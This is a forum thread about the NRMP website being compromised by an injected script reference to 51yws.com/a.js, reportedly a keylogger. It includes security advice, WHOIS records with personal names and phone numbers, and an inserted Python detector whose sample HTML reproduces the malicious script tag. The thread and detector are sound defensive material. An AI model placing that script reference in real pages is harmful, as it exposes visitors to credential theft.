NRMP site compromised


balaguru

So I thought I'd log into the site to enter a tentative rank list. The local machine that I was using kept throwing antivirus popups. The HTML source on their site contains a reference to 51yws.com/a.js which apparently installs some keyloggers. I sent email to [email protected]. I don't know if anybody is on the other end of that address so if you're using the site you might want to access it only from a machine running antivirus software.

*MOD NOTE: I just de-linked, better safe than sorry to leave a link to something that may be problematic out there* -t
 
Thank you for the warning, balaguru!

I just wanted to add that anti-viruses do not actually protect from keyloggers. To be protected from keyloggers you should have some kind of anti-keylogger, for example this one: XXXXXXXXX
I would also advise everyone to visit such sites only with anti-spyware and a firewall installed as well.
 
Most of the modern antivirus suites (by Symantec, ESET, McAfee) do in fact cover keyloggers. I am suspicious of the site you posted, especially seeing as you are currently a new user.



My advice is this:

1.) Always keep up to date with Windows Update. When Windows tells you there is a patch available, install it and reboot as asked.

If you happen to be ok with Mac OS, stick with it. Frankly you'd probably be safer in today's malware environment. Linux too.

2.) Invest in a solid antivirus program from one of the major vendors -- AND KEEP IT UP TO DATE. Most have autoupdate features, you just need to occasionally keep tabs on it. An out of date scanner is practically useless.

3.) Windows Firewall is decent. You don't really need anything beyond that. If you are paranoid (or you are on a static IP address) you can always throw a router between yourself and your broadband device and borrow the protection of NAT and an SPI firewall.


Don't install any program that you didn't learn about in a legitimate fashion. A kosher antispyware program will have had reviews in one of the major print computing journals (PC Magazine, PC World, etc).

Caveat emptor
 
Kudos on the pickup. My IE7 is locked down (I run it by default in the high security setting...) so I didn't see it, but I did notice the lag and the status bar showing it was attempting to retrieve code from the remote site.

Spoke briefly with NRMP, they are aware. As of now, the code looks like it has been removed from the main page.

The good news is that this seems to only be a defacement of the main NRMP site (NOT the R3 system). The pages that are served by their secure R3 server did not have any of this code (I checked this afternoon after you posted).

Hopefully they keep their act together and keep the servers clean...
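
The manual check described in this thread (reading a page's HTML source for a script reference to an outside host) can be automated. The following is an added example, not part of any post here; `example.org` and `static.example.org` are placeholder hosts, and the function and class names are illustrative.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tags whose src attribute makes the browser fetch and run/render remote content.
ACTIVE_TAGS = {"script", "iframe", "frame", "embed"}


class ActiveSrcCollector(HTMLParser):
    """Collect (tag, src) for every tag that loads active content."""
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag in ACTIVE_TAGS:
            src = dict(attrs).get("src")
            if src:
                self.found.append((tag, src.strip()))


def foreign_sources(html, page_url, allowed_hosts):
    """Return (tag, absolute_url, host) for active content from unexpected hosts."""
    page_host = urlsplit(page_url).hostname
    allowed = {h.lower() for h in allowed_hosts} | {page_host}
    collector = ActiveSrcCollector()
    collector.feed(html)
    flagged = []
    for tag, src in collector.found:
        absolute = urljoin(page_url, src)  # resolves relative and //host/path forms
        host = urlsplit(absolute).hostname
        if host and host not in allowed:
            flagged.append((tag, absolute, host))
    return flagged


# Constructed sample page; example.org stands in for the affected site.
SAMPLE_HTML = """
<html><head>
<script src="/js/menu.js"></script>
<script src="https://static.example.org/lib.js"></script>
</head><body>
<SCRIPT SRC=http://51yws.com/a.js></SCRIPT>
</body></html>
"""

if __name__ == "__main__":
    hits = foreign_sources(SAMPLE_HTML, "http://www.example.org/", {"static.example.org"})
    for tag, url, host in hits:
        print(f"unexpected <{tag}> from {host}: {url}")
```

Run on a schedule against a site's public pages, a check like this flags an injected reference as soon as it appears in the served HTML.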
 
WHOIS information for: 51yws.com:

Domain Name.......... 51yws.com
Creation Date........ 2008-01-14 23:27:57
Registration Date.... 2008-01-14 23:27:57
Expiry Date.......... 2009-01-14 23:27:57
Organisation Name.... Star Co.Ltd
Organisation Address. Star Street
Organisation Address. GuangZhou
Organisation Address. 100000
Organisation Address. GD
Organisation Address. CN

Admin Name........... Zhang ShanShan
Admin Address........ Star Street
Admin Address........ GuangZhou
Admin Address........ 100000
Admin Address........ GD
Admin Address........ CN
Admin Email.......... [email protected]

Bill Name............ Yang FuWei
Bill Address......... 5-32,55 Jingsan Road
Bill Address......... Zhengzhou
Bill Address......... 450008
Bill Address......... HA
Bill Address......... CN
Bill Phone........... +86.37163389133
Bill Fax............. +86.37163389132
 